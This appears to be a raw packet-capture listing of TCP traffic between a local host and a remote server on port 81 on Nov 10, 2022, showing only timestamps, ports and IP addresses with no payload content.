Nov 10, 2022 11:43:11.612895966 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.612942934 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.613063097 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.613518000 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.645314932 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.645476103 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.645625114 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.645625114 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.645642996 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.645689964 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.645731926 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.645735025 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.645773888 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.645777941 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.645814896 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.645857096 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.645895004 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.645895004 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.645895004 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.645972967 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.646122932 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.646122932 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.646132946 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.646179914 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.646214962 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.646262884 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.646297932 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.646449089 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.646539927 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.646585941 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.646636963 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.646661997 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.646689892 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.646791935 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.646812916 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.646951914 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.647000074 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.647083998 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.647125959 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.647207022 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.647207022 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.647208929 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.647207022 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.647253036 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.647294044 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.647305012 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.647378922 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.647378922 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.647391081 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.647433996 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.647475958 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.647511005 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.647511005 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.647557974 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.647559881 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.647600889 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.647643089 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.647648096 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.647686005 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.647725105 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.647728920 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.647728920 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.647794962 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.647794962 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.647810936 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.647852898 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.647895098 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.647898912 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.647937059 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.647945881 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648044109 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648045063 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648045063 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648087978 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648129940 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648173094 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648179054 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648179054 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648215055 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648250103 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648250103 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648257971 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648299932 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648302078 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648334980 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648406982 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648431063 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648431063 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648431063 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648453951 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648488998 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648497105 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648533106 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648538113 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648576021 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648578882 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648621082 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648622036 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648663044 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648699999 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648699999 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648705006 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648746014 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648746014 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648787975 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648792028 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648833990 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648843050 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.648881912 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.648885012 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.649178028 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.649178028 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.651045084 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651181936 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651226997 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651312113 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651340961 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.651340961 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.651340961 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.651382923 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651424885 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651465893 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651505947 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651546955 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651588917 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651628971 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651669025 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651707888 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651746988 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651786089 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651824951 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651863098 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651901007 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651940107 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.651978970 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.652029991 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.652070999 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.652200937 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.652200937 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.652201891 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.652201891 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.652201891 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.652201891 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.652201891 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.652201891 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.652286053 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.652287006 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.652287006 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.652287006 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.652287006 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.652287006 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.652287006 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.652287006 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.652311087 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.652311087 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.652311087 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.653599977 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.653644085 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.653683901 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.653724909 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.653764963 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.653805971 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.653958082 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.653999090 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654041052 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654083014 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654089928 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.654124975 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654145956 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.654166937 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654207945 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654247999 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654258013 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.654289961 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654321909 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.654330015 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654345036 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.654371023 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654396057 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.654412031 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654453039 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654481888 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.654493093 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654535055 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654556990 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.654573917 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654614925 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654644966 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.654654980 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654695034 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654716969 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.654735088 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654774904 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654778004 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.654815912 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654833078 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.654858112 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654927015 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.654958010 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.654999971 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655041933 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655069113 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.655081987 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655122042 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655162096 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655162096 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.655204058 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655216932 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.655245066 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655287027 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655317068 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655349016 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655389071 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655395985 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.655431032 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655467987 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.655468941 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655509949 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655534983 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.655549049 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655589104 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655627966 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655630112 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.655669928 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655708075 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655747890 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655774117 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.655786991 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655808926 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.655827999 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655857086 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.655869007 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655909061 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.655932903 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.655951977 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.656002045 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.656018972 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.656064987 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.656105995 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.656131029 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.656147957 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.656188011 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.656215906 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.656227112 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.656267881 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.656289101 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.656310081 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.656384945 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.656794071 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.695923090 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.696001053 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.696046114 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.696085930 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.696088076 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.696088076 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.696088076 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.696126938 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.696149111 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.696168900 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.696178913 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.696223974 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.714091063 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714158058 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714202881 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714246035 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714266062 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.714287043 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714330912 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714355946 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.714373112 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714415073 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714432955 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.714459896 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714498997 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.714500904 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714545012 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714586020 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714590073 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.714627028 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714658976 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714689970 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714731932 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714740038 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.714771032 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.714775085 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714817047 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.714818001 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714862108 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714906931 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.714936972 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.714978933 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715019941 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.715028048 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715074062 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715099096 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.715114117 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715152025 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.715153933 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715194941 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715233088 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715233088 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.715275049 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715312004 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.715313911 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715354919 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715375900 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.715396881 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715435028 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.715435982 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715476036 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715514898 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715519905 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.715555906 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715594053 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.715595961 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715637922 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715641975 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.715678930 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715717077 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.715720892 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715760946 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715795994 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.715800047 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715841055 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715873003 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.715881109 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715919971 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.715920925 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.715961933 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716000080 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.716001987 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716046095 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716083050 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.716084957 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716097116 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.716125965 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716164112 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.716166019 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716207027 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.716243982 CET	49172	81	192.168.2.22	206.81.11.20
